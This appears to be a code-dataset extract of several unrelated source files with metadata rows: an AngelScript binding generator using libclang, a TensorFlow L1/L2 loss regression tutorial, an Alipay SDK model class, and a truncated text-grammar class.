                return _assert("engine->RegisterObjectBehaviour(\"%s\", %s, \"%s\", %s)" % (self.clazz, self.behaviour, name, call))
def is_pure_virtual(cursor):
    """Heuristically detect a pure virtual method (`= 0`) by reading the raw
    source between the cursor's last descendant and the end of its extent."""
    # TODO: Use iterator here
    children = list(cursor.get_children())
    start = cursor.extent.start
    end = cursor.extent.end
    # Walk down the last-child chain so `start` ends up after the deepest
    # trailing child (i.e. just before any "= 0" suffix).
    while len(children) != 0:
        child = children[-1]
        children = list(child.get_children())
        start = child.extent.end
    f = open(cursor.location.file.name)
    f.seek(start.offset)
    length = end.offset-start.offset
    data = f.read(length)
    f.close()
    return re.search(r"=\s*0\s*$", data) != None
# Monotonic counter preserving class discovery order for registration.
objectindex = 0

class ObjectType:
    """A C++ class/struct found in the translation unit, together with the
    asOBJ_* flags deduced for its AngelScript registration."""

    def add_field(self, children, array):
        """Collect FIELD_DECL cursors from `children` into `array`, recursing
        into base classes so inherited fields are included."""
        for child in children:
            if child.kind == cindex.CursorKind.CXX_BASE_SPECIFIER:
                # BUG FIX: the recursive call was spelled `self.add_fields`,
                # a method that does not exist, so any class with a base
                # raised AttributeError here.
                # NOTE(review): get_reference() vs get_resolved_cursor()
                # (used in __init__) — confirm which cindex API is current.
                self.add_field(child.get_reference().get_children(), array)
            if child.kind == cindex.CursorKind.FIELD_DECL:
                array.append(child)

    def __init__(self, cursor, children, name):
        global objectindex
        self.cursor = cursor
        self.name = name
        self.flags = {"asOBJ_APP_CLASS": True}
        fields = []
        self.parents = []
        self.index = objectindex
        objectindex += 1
        self.has_pure_virtuals = False
        # Default member access: classes start private, structs public.
        access = cindex.AccessSpecifier.PRIVATE if cursor.kind == cindex.CursorKind.CLASS_DECL else cindex.AccessSpecifier.PUBLIC
        for child in children:
            if child.kind == cindex.CursorKind.CXX_BASE_SPECIFIER:
                c = child.get_resolved_cursor()
                parentname = c.spelling
                if parentname in objecttypes:
                    ot = objecttypes[parentname]
                    self.parents.extend(ot.parents)
                    self.parents.append(parentname)
                    # Clone the parent's registered methods/fields onto this
                    # class so inherited members are registered for it too.
                    toadd = []
                    for om in objectmethods:
                        if om.clazz == parentname:
                            f = copy.deepcopy(om)
                            f.clazz = self.name
                            toadd.append(f)
                    objectmethods.extend(toadd)
                    toadd = []
                    for of in objectfields:
                        if of.clazz == parentname:
                            f = copy.deepcopy(of)
                            f.clazz = self.name
                            toadd.append(f)
                    objectfields.extend(toadd)
                continue
            if child.kind == cindex.CursorKind.CXX_ACCESS_SPEC_DECL:
                access = child.access_specifier
                continue
            if not access == cindex.AccessSpecifier.PUBLIC:
                # Only public members are exposed to script.
                continue
            if child.kind == cindex.CursorKind.CXX_METHOD:
                if child.spelling == "operator=":
                    self.flags["asOBJ_APP_CLASS_ASSIGNMENT"] = True
                if child.is_static_method():
                    # TODO
                    logWarning("Skipping member method %s::%s as it's static" % (self.name, child.spelling))
                    continue
                try:
                    objectmethods.append(Function(child, self.name))
                except Exception as e:
                    logWarning("Skipping member method %s::%s - %s" % (self.name, child.spelling, e))
                if is_pure_virtual(child):
                    self.has_pure_virtuals = True
            elif child.kind == cindex.CursorKind.CONSTRUCTOR:
                self.flags["asOBJ_APP_CLASS_CONSTRUCTOR"] = True
                try:
                    f = Function(child, self.name, "asBEHAVE_CONSTRUCT")
                    behaviours.append(f)
                except Exception as e:
                    logWarning("Skipping constructor %s::%s - %s" % (self.name, child.spelling, e))
            elif child.kind == cindex.CursorKind.DESTRUCTOR:
                self.flags["asOBJ_APP_CLASS_DESTRUCTOR"] = True
                try:
                    f = Function(child, self.name, "asBEHAVE_DESTRUCT")
                    behaviours.append(f)
                except Exception as e:
                    logWarning("Skipping destructor %s::%s - %s" % (self.name, child.spelling, e))
            elif child.kind == cindex.CursorKind.FIELD_DECL:
                try:
                    # Renamed from `type` to avoid shadowing the builtin.
                    field_type = Type(child.type)
                    objectfields.append(ObjectField(self.name, child.spelling, field_type))
                except Exception as e:
                    logWarning("Skipping member field %s::%s - %s" % (self.name, child.spelling, e))
            elif child.kind == cindex.CursorKind.TYPEDEF_DECL:
                # Renamed locals: the originals shadowed the `name` parameter.
                tname, tkind = get_typedef(child)
                if tname:
                    typedef[tname] = tkind
                logWarning("Typedefs within classes are not supported by AngelScript")
            else:
                logWarning("Unhandled cursor: %s, %s" % (child.displayname, child.kind))
        if "asOBJ_APP_CLASS_DESTRUCTOR" not in self.flags:
            # No destructor -> plain-old-data as far as AngelScript cares.
            self.flags["asOBJ_POD"] = True
        self.add_field(children, fields)
        if len(fields):
            try:
                # If every field shares one type, the ALLFLOATS/ALLINTS ABI
                # hints can be added.
                child = fields.pop(0)
                t = get_real_type(get_type(child.type, child))
                allEqual = True
                for field in fields:
                    t2 = get_real_type(get_type(field.type, field))
                    if t2 != t:
                        # BUG FIX: allEqual was never set to False, so the
                        # equal-type check was a no-op.
                        allEqual = False
                        break
                if allEqual:
                    if t == "float":
                        self.flags["asOBJ_APP_CLASS_ALLFLOATS"] = True
                    elif t == "int" or t == "unsigned int":
                        self.flags["asOBJ_APP_CLASS_ALLINTS"] = True
                    else:
                        # BUG FIX: the format string had one %s but two args,
                        # which raised TypeError (silently swallowed below).
                        logWarning("%s does not have all fields of equal type (%s). Trying ALLINTS anyway" % (self.name, t))
                        self.flags["asOBJ_APP_CLASS_ALLINTS"] = True
            except Exception:
                # Field type resolution may fail; flags stay conservative.
                pass

    def get_flags(self):
        """Resolve the asOBJ_* flag list, honouring config overrides."""
        flags = [] if is_reference_type(self.name) else list(self.flags)
        if "ObjectTypes" in config:
            for regex in config["ObjectTypes"]:
                if regex.search(self.name):
                    conf = config["ObjectTypes"][regex]
                    if "Flags" in conf:
                        flags = conf["Flags"]
                    if "ExtraFlags" in conf:
                        flags.extend(conf["ExtraFlags"])
        if not is_reference_type(self.name):
            # asOBJ_NOCOUNT only makes sense for reference types.
            if "asOBJ_NOCOUNT" in flags:
                flags.remove("asOBJ_NOCOUNT")
        return flags

    def get_register_string(self):
        """The engine->RegisterObjectType(...) statement(s) for this type.

        Side effect for counted reference types: fabricates AddRef/DelRef
        behaviours and appends them to the module-level `behaviours` list.
        """
        flags = self.get_flags()
        f = "%s%s%s" % ("asOBJ_REF" if is_reference_type(self.name) else "asOBJ_VALUE", "|" if len(flags) else "", "|".join(flags))
        if not is_reference_type(self.name):
            return _assert("engine->RegisterObjectType(\"%s\", sizeof(%s), %s)" % (self.name, self.name, f))
        ret = _assert("engine->RegisterObjectType(\"%s\", 0, %s)" % (self.name, f))
        for parent in self.parents:
            # Up- and down-casts between this type and each ancestor.
            extra = "_nocount" if "asOBJ_NOCOUNT" in flags else ""
            ret += "\n\t" + _assert("engine->RegisterObjectBehaviour(\"%s\", asBEHAVE_REF_CAST, \"%s@ f()\", asFUNCTION((refCast%s<%s,%s>)), asCALL_CDECL_OBJLAST)" % (parent, self.name, extra, parent, self.name))
            ret += "\n\t" + _assert("engine->RegisterObjectBehaviour(\"%s\", asBEHAVE_IMPLICIT_REF_CAST, \"%s@ f()\", asFUNCTION((refCast%s<%s,%s>)), asCALL_CDECL_OBJLAST)" % (self.name, parent, extra, self.name, parent))
        if not "asOBJ_NOCOUNT" in flags:
            # Counted reference types need AddRef/Release behaviours.
            f = Function(None)
            f.name = "AddRef"
            f.clazz = self.name
            f.const = False
            t = cindex.Type(cindex.TypeKind.VOID.from_param())
            f.behaviour = "asBEHAVE_ADDREF"
            f.return_type = Type(t)
            behaviours.append(f)
            f = copy.deepcopy(f)
            f.name = "DelRef"
            f.behaviour = "asBEHAVE_RELEASE"
            behaviours.append(f)
        return ret
class ObjectField:
    """A public member variable to expose as an AngelScript object property."""

    def __init__(self, clazz, name, type):
        self.clazz = clazz
        self.name = name
        self.type = type
        # Validate against the field include/exclude filters up front, so the
        # caller's except-clause skips filtered fields.
        pretty = self.pretty_name()
        if mfer and mfer.search(pretty):
            raise Exception("Matches exclude pattern")
        if mfir and not mfir.search(pretty):
            raise Exception("Doesn't match include pattern")

    def uses(self, typename):
        """True when this field's resolved type is `typename`."""
        return typename == self.type.resolved

    def pretty_name(self):
        """Human-readable `type Class::name` form used for filters and logs."""
        return "%s %s::%s" % (self.type, self.clazz, self.name)

    def get_register_string(self):
        """The engine->RegisterObjectProperty(...) statement for this field."""
        return _assert("engine->RegisterObjectProperty(\"%s\", \"%s %s\", asOFFSET(%s,%s))" % (self.clazz, self.type, self.name, self.clazz, self.name))
# Accumulators filled in by walk() while visiting the translation unit.
typedefs = []
enums = []
objecttypes = {}
functions = []
objectmethods = []
objectfields = []
includes = []
behaviours = []

def _assert(line):
    """Terminate a registration call, wrapping it in RegisterVerifyAPI()
    when the Assert config option is enabled."""
    template = "RegisterVerifyAPI(%s);" if doassert else "%s;"
    return template % line
def get_typedef(cursor):
    """Parse a TYPEDEF_DECL's tokens into (new_name, underlying_kind).

    Only handles the simple `typedef <words...> name ;` shape — every inner
    token must be an identifier or keyword.  For anything more complex,
    returns (None, raw_token_text) so the caller can log and skip it.
    """
    #tokens = cindex.tokenize(tu, cursor.extent)
    tokens = list(cindex.TokenGroup.get_tokens(tu, cursor.extent))
    good = True
    # Minimum shape: "typedef", kind, name, ";" — four tokens.
    if len(tokens) >= 4:
        for x in tokens[1:-2]:
            if x.kind != cindex.TokenKind.IDENTIFIER and x.kind != cindex.TokenKind.KEYWORD:
                good = False
                break
    else:
        good = False
    if good:
        # Everything between "typedef" and the final "name ;" is the kind.
        kind = " ".join([t.spelling for t in tokens[1:len(tokens)-2]])
        name = tokens[len(tokens)-2].spelling
    else:
        data = ""
        for token in tokens:
            data += token.spelling + " "
        return None, data
    return name, kind
def add_include(filename):
    """Queue a header for the generated file — once, and only .h files."""
    if filename.endswith(".h") and filename not in includes:
        includes.append(filename)
def walk(cursor):
    """Visit the translation unit's top-level cursors and populate the
    module-level registries (typedefs, enums, objecttypes, functions, ...)."""
    global typedefs
    global enums
    global objecttypes
    global functions
    global objectmethods
    for child in cursor.get_children():
        if not child.location.file:
            continue
        filename = child.location.file.name
        if child.kind == cindex.CursorKind.TYPEDEF_DECL:
            # Record typedefs for type resolution even from files that the
            # include/exclude filters below would reject.
            name, kind = get_typedef(child)
            if name:
                typedef[name] = kind
        if fer and fer.search(filename):
            continue
        if fir and not fir.search(filename):
            continue
        if child.kind == cindex.CursorKind.MACRO_DEFINITION:
            # Integer #defines become enum values in a HASH_DEFINES enum.
            tokens = list(cindex.TokenGroup.get_tokens(tu, child.extent))
            if tokens[0].kind == cindex.TokenKind.IDENTIFIER and tokens[1].kind == cindex.TokenKind.LITERAL and is_int(tokens[1].spelling):
                define = _assert("engine->RegisterEnumValue(\"HASH_DEFINES\", \"%s\", %s)" % (tokens[0].spelling, tokens[1].spelling))
                if define not in enums:
                    enums.append(define)
        elif child.kind == cindex.CursorKind.FUNCTION_DECL:
            try:
                f = Function(child)
                if "operator" in f.name:
                    raise Exception("Non member operator functions not supported currently")
                else:
                    functions.append(f)
                    add_include(filename)
            except Exception as e:
                logWarning("Skipping function %s - %s" % (child.spelling, e))
        elif child.kind == cindex.CursorKind.TYPEDEF_DECL:
            name, kind = get_typedef(child)
            if name:
                typedef[name] = kind
                if get_real_type(kind) not in as_builtins:
                    logWarning("Typedef %s = %s can't be registered as it doesn't resolve to an AngelScript builtin type" % (name, kind))
                else:
                    typedefs.append(_assert("engine->RegisterTypedef(\"%s\", \"%s\")" % (name, get_real_type(kind))))
            else:
                # NOTE(review): `name` is None on this path; `kind` holds the
                # raw token text and would be the more useful thing to log.
                logWarning("Typedef too complex, skipping: %s" % name)
        elif child.kind == cindex.CursorKind.CLASS_DECL or child.kind == cindex.CursorKind.STRUCT_DECL:
            children = list(child.get_children())
            if len(children) == 0:
                # Forward declaration — nothing to register.
                continue
            if oer and oer.search(child.spelling):
                continue
            if oir and not oir.search(child.spelling):
                continue
            classname = child.spelling
            if len(classname) == 0:
                classname = child.displayname
            if len(classname) == 0:
                logWarning("Skipping class or struct defined at %s" % cursor.extent)
                continue
            if classname in objecttypes:
                # TODO: different namespaces
                logWarning("Skipping type %s, as it is already defined" % classname)
                # BUG FIX: the warning said "skipping" but control fell
                # through and redefined the type; actually skip it.
                continue
            o = ObjectType(child, children, classname)
            objecttypes[classname] = o
            add_include(filename)
        elif child.kind == cindex.CursorKind.MACRO_INSTANTIATION or \
            child.kind == cindex.CursorKind.CONVERSION_FUNCTION or \
            child.kind == cindex.CursorKind.INCLUSION_DIRECTIVE or \
            child.kind == cindex.CursorKind.UNEXPOSED_DECL:
            continue
        # TODO: Make sure this is what we want
        elif child.kind == cindex.CursorKind.CONSTRUCTOR or \
            child.kind == cindex.CursorKind.CXX_METHOD:
            continue
        else:
            logWarning("Unhandled cursor: %s, %s" % (child.displayname, child.kind))
# Removes usage of object types that are used both as a reference and a value type
def mismatch_filter(source, toremove):
    """Drain `source`, keeping entries that do not use type `toremove`.

    Consumes `source` in place (callers rebind the result); removed entries
    are reported through logWarning.
    """
    kept = []
    while source:
        entry = source.pop(0)
        if entry.uses(toremove):
            logWarning("\t%s" % entry.pretty_name())
        else:
            kept.append(entry)
    return kept
def remove_ref_val_mismatches():
    """Drop every function/method/behaviour that uses a type in the way that
    contradicts its ref/value classification (e.g. a value use of a type
    registered as a reference type)."""
    global functions
    global objectmethods
    global behaviours
    for key in objecttype_scoreboard:
        isref = is_reference_type(key)
        ref, val = objecttype_scoreboard[key]
        # Consistent usage — nothing to remove.
        if (isref and val == 0) or (not isref and ref == 0):
            continue
        logWarning("\"%s\" is used both as a reference type (%d) and a value type (%d). The following will be removed:" % (key, ref, val))
        # The "wrong" spelling is the pointer form for value types and the
        # plain form for reference types.
        toremove = "%s%s" % (key, "*" if not isref else "")
        functions = mismatch_filter(functions, toremove)
        objectmethods = mismatch_filter(objectmethods, toremove)
        behaviours = mismatch_filter(behaviours, toremove)
def unknown_filter(source):
    """Drain `source`, keeping entries whose argument and return types are
    all known; removed entries are reported through logWarning."""
    kept = []
    while source:
        entry = source.pop(0)
        unknown = None
        # Remember the last offending type name for the log message
        # (return type takes precedence over arguments).
        for arg_type in entry.args:
            if not arg_type.is_known():
                unknown = arg_type.resolved
        if not entry.return_type.is_known():
            unknown = entry.return_type.resolved
        if unknown is None:
            kept.append(entry)
        else:
            logWarning("Removing %s as it's using an unknown type %s [disable with -ku]" % (entry.pretty_name(), unknown))
    return kept
def remove_unknowns():
    """Filter every callable registry down to entries with fully-known types."""
    global functions
    global objectmethods
    global behaviours
    functions = unknown_filter(functions)
    objectmethods = unknown_filter(objectmethods)
    behaviours = unknown_filter(behaviours)
def dup_filter(source):
    """Drain `source`, dropping entries whose pretty_name was already seen.

    Removed duplicates are reported through logWarning.
    """
    kept = []
    # Set instead of list: O(1) membership (was O(n) list scan per entry);
    # also drops the `keep` flag that was assigned but never read.
    seen = set()
    while source:
        entry = source.pop(0)
        pn = entry.pretty_name()
        if pn in seen:
            logWarning("Removing duplicate function %s" % pn)
        else:
            kept.append(entry)
            seen.add(pn)
    return kept
def remove_duplicates():
    """Deduplicate every callable registry by pretty_name."""
    global functions
    global objectmethods
    global behaviours
    functions = dup_filter(functions)
    objectmethods = dup_filter(objectmethods)
    behaviours = dup_filter(behaviours)
def remove_reference_destructors():
    """Drop destructor behaviours registered for reference types — those are
    released through their reference count, not destructed in place."""
    global behaviours
    pending = behaviours
    behaviours = []
    while pending:
        b = pending.pop(0)
        if b.behaviour == "asBEHAVE_DESTRUCT" and is_reference_type(b.clazz):
            logWarning("Removing destructor for reference type %s" % b.clazz)
        else:
            behaviours.append(b)
def remove_pure_virtual_constructors():
    """Drop constructors/factories of abstract classes — a class with pure
    virtual members cannot be instantiated."""
    global behaviours
    pending = behaviours
    behaviours = []
    while pending:
        b = pending.pop(0)
        abstract = b.clazz in objecttypes and objecttypes[b.clazz].has_pure_virtuals
        if abstract and b.behaviour in ("asBEHAVE_CONSTRUCT", "asBEHAVE_FACTORY"):
            logWarning("Removing constructor for type %s which has pure virtual members" % b.clazz)
        else:
            behaviours.append(b)
walk(tu.cursor)
# File processed, do some post processing
remove_ref_val_mismatches()
if not keep_unknowns:
    remove_unknowns()
remove_duplicates()
remove_reference_destructors()
remove_pure_virtual_constructors()
if output_filename != None:
    output_filename = output_filename.replace("${this_file_path}", os.path.dirname(os.path.abspath(configfile)))
# Register object types in discovery order. BUG FIX: sort(key=...) replaces
# the Python-2-only sort(cmp=...) form, which raises TypeError on Python 3.
ot = [objecttypes[o] for o in objecttypes]
ot.sort(key=lambda a: a.index)
for diag in tu.diagnostics:
    logWarning("clang had the following to say: %s" % (diag.spelling))
objectTypeStrings = []
for o in ot:
    objectTypeStrings.append(o.get_register_string())
# BUG FIX: walk() already stores fully-formed registration *strings* in
# `typedefs` (see its TYPEDEF_DECL branch), so calling get_register_string()
# on each entry raised AttributeError.
typeDefStrings = list(typedefs)
functionStrings = []
for o in functions:
    functionStrings.append(o.get_register_string())
behaviourStrings = []
for o in behaviours:
    behaviourStrings.append(o.get_register_string())
objectMethodStrings = []
for o in objectmethods:
    objectMethodStrings.append(o.get_register_string())
objectFieldStrings = []
for o in objectfields:
    objectFieldStrings.append(o.get_register_string())
tpl = Template(filename='ScriptBind.mako')
rendered = tpl.render(
    genericWrappers=generic_wrappers,
    funcName=funcname,
    includes=includes,
    objectTypes=objectTypeStrings,
    typeDefs=typeDefStrings,
    hashDefines=_assert("engine->RegisterEnum(\"HASH_DEFINES\")"),
    enums="",  # NOTE(review): the `enums` list built by walk() is never passed here — confirm against ScriptBind.mako
    functions=functionStrings,
    behaviours=behaviourStrings,
    objectMethods=objectMethodStrings,
    objectFields=objectFieldStrings)
# NOTE(review): when the config has no OutputFile, output_filename is None and
# this open() fails — presumably the config always sets it; confirm.
with open(output_filename, "w") as f:
    f.write(rendered)
sys.stderr.write("Finished with %d warnings\n" % warn_count)
| 35.252592
| 221
| 0.558859
| 4,186
| 37,403
| 4.889871
| 0.124462
| 0.005863
| 0.027358
| 0.02687
| 0.327031
| 0.242904
| 0.187796
| 0.142704
| 0.108066
| 0.091602
| 0
| 0.003697
| 0.320188
| 37,403
| 1,060
| 222
| 35.285849
| 0.801314
| 0.019838
| 0
| 0.307606
| 0
| 0.002237
| 0.132897
| 0.027316
| 0.001119
| 0
| 0
| 0.000943
| 0.01566
| 1
| 0.045861
| false
| 0.003356
| 0.00783
| 0.005593
| 0.111857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ca90abf615365ec5eda2bc92c9c7ddc159748c
| 3,699
|
py
|
Python
|
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
cookbook/3 Linear Regression/lin_reg_l1_l2_loss.py
|
keetsky/tensorflow_learn
|
77205434c2e3d70d482a756f5f679622d10f49b2
|
[
"Apache-2.0"
] | null | null | null |
'''
# Linear Regression: understanding loss function in linear regression
#----------------------------------
#
# This function shows how to use Tensorflow to
# solve linear regression.
# y = Ax + b
#
# We will use the iris data, specifically:
# y = Sepal Length
# x = Petal Width
'''
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from sklearn import datasets
from tensorflow.python.framework import ops
#%%
# L2 Loss: fit y = Ax + b on the iris data by minimizing mean squared error.
ops.reset_default_graph()
sess=tf.Session()
# Load the data
# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]
iris=datasets.load_iris()
x_vals=np.array([x[3] for x in iris.data])  # feature: Petal Width
y_vals=np.array([y[0] for y in iris.data])  # target: Sepal Length
# Declare batch size
batch_size = 25
# Initialize placeholders
x_data=tf.placeholder(shape=[None,1],dtype=tf.float32)
y_=tf.placeholder(shape=[None,1], dtype=tf.float32)
# Create variables for linear regression (randomly-initialized 1x1 slope and intercept)
A=tf.Variable(tf.random_normal(shape=[1,1]))
b=tf.Variable(tf.random_normal(shape=[1,1]))
# Declare model operations: y = x*A + b
y=tf.add(tf.matmul(x_data,A),b)
# Declare L2 loss: mean over the batch of (y_ - y)^2
loss=tf.reduce_mean(tf.square(y_- y))
# Declare optimizer (plain gradient descent, learning rate 0.4)
op=tf.train.GradientDescentOptimizer(0.4)
train_step=op.minimize(loss)
# Initialize variables
init=tf.global_variables_initializer()
sess.run(init)
# Training loop: 100 steps of mini-batch SGD, recording the batch loss each step
loss_vec_l2=[]
for i in range(100):
    rand_index=np.random.choice(len(x_vals),size=batch_size)# randomly draw 25 indices from range(len(x_vals))
    rand_x=np.transpose([x_vals[rand_index]])
    rand_y=np.transpose([y_vals[rand_index]])
    sess.run(train_step,feed_dict={x_data:rand_x,y_:rand_y})
    temp_loss=sess.run(loss,feed_dict={x_data:rand_x,y_:rand_y})
    loss_vec_l2.append(temp_loss)
    if (i+1)%25==0:
        print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
        print('Loss = ' + str(temp_loss))
#%%
# L1 Loss: the same regression, minimizing mean absolute error instead.
ops.reset_default_graph()
# Create graph
sess = tf.Session()
# Load the data
# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]
iris = datasets.load_iris()
x_vals = np.array([x[3] for x in iris.data])  # feature: Petal Width
y_vals = np.array([y[0] for y in iris.data])  # target: Sepal Length
# Declare batch size and number of iterations
batch_size = 25
# NOTE(review): the original comment claims L1 "will not converge" at 0.4 —
# plausible, since the L1 gradient magnitude does not shrink near the optimum,
# so fixed-size steps keep bouncing. Confirm and lower if a settled fit is wanted.
learning_rate = 0.4 # Will not converge with learning rate at 0.4
iterations = 100
# Initialize placeholders
x_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
y_target = tf.placeholder(shape=[None, 1], dtype=tf.float32)
# Create variables for linear regression
A = tf.Variable(tf.random_normal(shape=[1,1]))
b = tf.Variable(tf.random_normal(shape=[1,1]))
# Declare model operations: y = x*A + b
model_output = tf.add(tf.matmul(x_data, A), b)
# Declare L1 loss: mean absolute deviation over the batch
loss_l1 = tf.reduce_mean(tf.abs(y_target - model_output))
# Declare optimizers
my_opt_l1 = tf.train.GradientDescentOptimizer(learning_rate)
train_step_l1 = my_opt_l1.minimize(loss_l1)
# Initialize variables.
# Fixed: tf.initialize_all_variables() is the long-deprecated spelling —
# use tf.global_variables_initializer(), as the L2 section above already does.
# Also moved after the optimizer is built so any optimizer-created slot
# variables would be initialized too.
init = tf.global_variables_initializer()
sess.run(init)
# Training loop: 100 steps of mini-batch SGD, recording the batch loss each step
loss_vec_l1 = []
for i in range(iterations):
    rand_index = np.random.choice(len(x_vals), size=batch_size)
    rand_x = np.transpose([x_vals[rand_index]])
    rand_y = np.transpose([y_vals[rand_index]])
    sess.run(train_step_l1, feed_dict={x_data: rand_x, y_target: rand_y})
    temp_loss_l1 = sess.run(loss_l1, feed_dict={x_data: rand_x, y_target: rand_y})
    loss_vec_l1.append(temp_loss_l1)
    if (i+1)%25==0:
        print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
#%%
# Plot both loss curves over training steps.
plt.plot(loss_vec_l1, 'k-', label='L1 Loss')
plt.plot(loss_vec_l2, 'r--', label='L2 Loss')
plt.title('L1 and L2 Loss per Generation')
plt.xlabel('Generation')
# Fixed axis label: the figure shows both the L1 and L2 curves, not only L1.
plt.ylabel('Loss')
plt.legend(loc='upper right')
plt.show()
| 30.073171
| 92
| 0.711544
| 624
| 3,699
| 4.048077
| 0.235577
| 0.027712
| 0.017419
| 0.034838
| 0.527712
| 0.510689
| 0.510689
| 0.510689
| 0.510689
| 0.457641
| 0
| 0.023958
| 0.131117
| 3,699
| 122
| 93
| 30.319672
| 0.761979
| 0.263585
| 0
| 0.447761
| 0
| 0
| 0.042799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074627
| 0
| 0.074627
| 0.044776
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75cdec8d921818ac60703e7cb57923284eb229e2
| 2,499
|
py
|
Python
|
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/domain/AlipayCommerceEducateTuitioncodeMonitorCreateModel.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceEducateTuitioncodeMonitorCreateModel(object):
    """Payload model for alipay.commerce.educate.tuitioncode.monitor.create.

    Holds four optional string-like fields; only truthy fields are emitted
    by :meth:`to_alipay_dict`.
    """

    # Field names shared by the generic dict conversions below;
    # the order fixes the key order of the serialized dict.
    _FIELD_NAMES = ('bank_type', 'login_account', 'out_apply_id', 'parent_no')

    def __init__(self):
        self._bank_type = None
        self._login_account = None
        self._out_apply_id = None
        self._parent_no = None

    @property
    def bank_type(self):
        return self._bank_type

    @bank_type.setter
    def bank_type(self, value):
        self._bank_type = value

    @property
    def login_account(self):
        return self._login_account

    @login_account.setter
    def login_account(self, value):
        self._login_account = value

    @property
    def out_apply_id(self):
        return self._out_apply_id

    @out_apply_id.setter
    def out_apply_id(self, value):
        self._out_apply_id = value

    @property
    def parent_no(self):
        return self._parent_no

    @parent_no.setter
    def parent_no(self, value):
        self._parent_no = value

    def to_alipay_dict(self):
        """Serialize truthy fields to a dict, delegating to a nested
        object's own to_alipay_dict() when it has one."""
        params = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if not value:
                continue
            if hasattr(value, 'to_alipay_dict'):
                params[name] = value.to_alipay_dict()
            else:
                params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a plain dict; returns None for a falsy input."""
        if not d:
            return None
        o = AlipayCommerceEducateTuitioncodeMonitorCreateModel()
        for name in AlipayCommerceEducateTuitioncodeMonitorCreateModel._FIELD_NAMES:
            if name in d:
                setattr(o, name, d[name])
        return o
| 29.05814
| 77
| 0.605442
| 317
| 2,499
| 4.422713
| 0.14511
| 0.085592
| 0.10699
| 0.0699
| 0.32097
| 0.272468
| 0.0699
| 0.042796
| 0
| 0
| 0
| 0.000572
| 0.30052
| 2,499
| 85
| 78
| 29.4
| 0.801487
| 0.016807
| 0
| 0.115942
| 0
| 0
| 0.092947
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15942
| false
| 0
| 0.028986
| 0.057971
| 0.304348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75d4809609a0cd8b60448ab7ac5fccbe7bba640b
| 5,010
|
py
|
Python
|
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
maze.py
|
vcxsd/muck-builder
|
12c1defbb816395a119da1992c1352d614d5507b
|
[
"MIT"
] | null | null | null |
import random
import yaml
class Grammar:
    """ A simpler version of Tracery's ideas.

    ``rules`` maps a rule name to a list of alternative expansion strings.
    ``parse`` replaces every ``[name]`` in its input with a randomly chosen,
    recursively parsed alternative of that rule.
    """
    def __init__( self, rules = None ):
        # 'rules or {}' also sidesteps the shared-mutable-default pitfall:
        # each instance gets its own fresh dict unless one is supplied.
        self.rules = rules or { }
        # Results of "[!name]" expansions. To be pop()'d off by the caller.
        self.saved = [ ]

    def parse( self, string ):
        """Expand every bracketed rule reference in *string* and return the result.

        Raises Exception on nested brackets, an unmatched ']' or an unknown
        rule name. A '!' anywhere inside the brackets additionally appends
        the produced expansion to self.saved.
        """
        if "[" in string or "]" in string:
            fragments = [ ]
            buffer = ''
            brackets = False
            for char in string:
                if char == '[':
                    # Flush literal text gathered so far.
                    fragments += [ buffer ]
                    buffer = ''
                    if brackets:
                        raise Exception( "Grammar.parse: can't nest brackets" )
                    brackets = True
                elif char == ']':
                    if not brackets:
                        raise Exception( "Grammar.parse: unmatched bracket" )
                    brackets = False
                    # Mechanism for saving what result we got: put a ! somewhere in the [ ]-surrounded text.
                    if buffer.replace( "!", "" ) in self.rules:
                        fragments += [ self.parse( random.choice( self.rules[buffer.replace( "!", "" )] ) ) ]
                        if "!" in buffer:
                            self.saved += [ fragments[-1] ]
